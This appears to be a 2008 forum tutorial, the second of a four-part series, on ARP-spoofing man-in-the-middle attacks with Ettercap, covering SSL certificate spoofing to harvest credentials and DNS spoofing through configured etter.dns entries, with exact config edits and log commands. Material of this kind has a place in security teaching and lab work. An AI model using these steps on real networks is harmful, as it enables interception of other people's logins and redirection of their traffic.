How to ARP Spoof - Man In The Middle Attacks

Submitted by r00tk1ll on Wed, 04/23/2008 - 03:21.

This is the second segment of a four part tutorial covering the most common situations in which ARP spoofing is utilized and the mechanics involved. In this segment I will cover a couple of man in the middle (MITM) attacks possible while ARP spoofing using the GUI version of Ettercap (available in Backtrack) . Please maintain your ethics and don’t misuse this information as it is for educational purposes, I am not responsible for any illegal activities!

How this tutorial is divided:
This tutorial assumes you have a good understanding of how ARP works within a LAN and the concepts involved in basic ARP spoofing. If you do not please review Part 1: Sniffing LAN Traffic and my ARP spoofing PowerPoint.

Tutorial Quick Links:
Part 1: Sniffing LAN Traffic
Part 2: Man in the Middle Attacks (MITM)
Part 3: Denial of Service (DoS)
Part 4: Using Filters

Part 2: Man in the Middle Attacks (MITM)

Check out the video tutorial on YouTube!

Description of the attack (Active Spoofing):
After an attacker on the local network spoofs two or more host’s MAC addresses and traffic is forwarded through him, the attacker then can manipulate the data using the filters and plugins available in Ettercap then forward the altered data on to its original destination.

Methodology
In the last segment I briefly discussed enumeration; that is the process of discovering the hosts on the network. Another important method used to further explore a network is the process of “network fingerprinting” or “blueprinting”. I will save the details for a future tutorial but the basic purpose is to take the hosts you have enumerated and determine what they are, what ports they have open, what services they offer, and determine what possible vulnerabilities exist. Great tools for this purpose built into Backtrack are Autoscan and GFI-LAN Guard. The reason we do this is to know who to target for a specific attack, for example if you want to spoof DNS requests you should target the DNS server, same for a SMB server. After establishing our targets we can then decide how to alter the transmissions with either plugins or filters.

More on Plugins
Ettercap comes with several built in plugins that allow you to perform preset functions on the victims you are spoofing. At any time in your ARP spoof you can select Plugins -> Manage the plugins to display a list of them to choose from, activate a plugin by double clicking on it. Plugins include DNS spoofing, Remote Browser Viewing, DoS, and many more.

Example MITM Attacks in Backtrack

SSL Spoofing
Spoofing SSL or TLS is an ability that is built into Ettercap and allows for us to see what should be encrypted data in plain text. It works by intercepting a valid security certificate from a remote server, then issuing a client a similar certificate from Ettercap. When the client accepts this certificate and submits his information back, Ettercap decrypts it using the key it generated for itself. Finally Ettercap re-encrypts the data using the original server certificate and submits the data to the original destination.

Note: You need to edit the etter.conf file in order to make this work, it is normally in the “/usr/local/etc/ “ directory, if not try typing “whereis etter.conf” at the command prompt. In the run dialog box or at a command prompt type “kate”, once Kate is open go to File -> Open. In the location box type “/usr/local/etc/etter.conf”. In the first section of this file labeled “[privs]” change:

ec_uid = 65534
ec_gid = 65534

ec_uid = 0
ec_gid = 0

Next go down to line 167 where is says “if you use ip tables” and uncomment line 168 & 169 by removing the “#” signs.

#redir_command_on
#redir_command_off

redir_command_on
redir_command_off

That’s basically all the configuration you have to do to make this work, now just start ARP spoofing a target as described in the first tutorial and Ettercap will automatically spoof the certificates for you, it will also notify you in the bottom pane when it has collected any data. The fake certificate will look almost exactly like a valid certificate except for the hash values. For this reason it will almost always prompt the user to accept the certificate, but upon examining the certificate it will look like a simple server misconfiguration. To view the captured data you can either use the Wireshark method discussed in part 1 or you can specify Logging -> “Log only info’s” in Ettercap’s GUI to save the relevant data in a log file. To view this file just type “etterlog logname.log” and Etterlog will display all the captured usernames and passwords under the Account sections of this file.

DNS Spoofing
To perform the DNS spoofing attack via Ettercap we need to use the built in DNS_spoof plug-in which must first be configured in the etter.dns file with the domain names and the IP addresses you want to translate them to. When this plugin is active it intercepts all DNS responses and looks for a domain name that you have specified in this file. If it finds a match it replaces the real IP address with the one you have specified. This works for A, PTR, and MX records and wildcards are accepted for all but the PTR type. Remember that most hosts have a DNS resolver cache on their machines, so if they have the address stored in the cache they will not request a DNS lookup (ipconfig /flushdns will clear this on windows).

To get started open up Kate and open “/usr/local/share/ettercap/etter.dns”, reading through this file will give you some good examples of the syntax but here are some quick examples:

www.google.com A 66.48.69.100 - Google is at www.webkins.com (66.48.69.100)
*.yahoo.com A 164.109.32.152 - Anything at google.com goes to www.mcdonalds.com

I would save this file under another name and create a new etter.dns in this directory. Once you are done adding your entries save the file and open Ettercap. For this attack you want to target your DNS server so you can catch the DNS replies, this is why network blueprinting is important because the DNS server is not always the gateway! Add the DNS server to target 1 and your hosts to target 2. Now click Plugins -> Manage the plugins, in this list double click “dns_spoof”. Start ARP spoofing the targets as usual and the attack should be underway. Ettercap will notify you in the bottom pane when a DNS spoof has occurred.

Conclusion
In the next segment I will expand on these ideas further by showing how ARP spoofing with Ettercap and its plugins can be used to perform denial of services (DoS) attacks on single or multiple targets. As usual if you have any questions or requests feel free to post them up.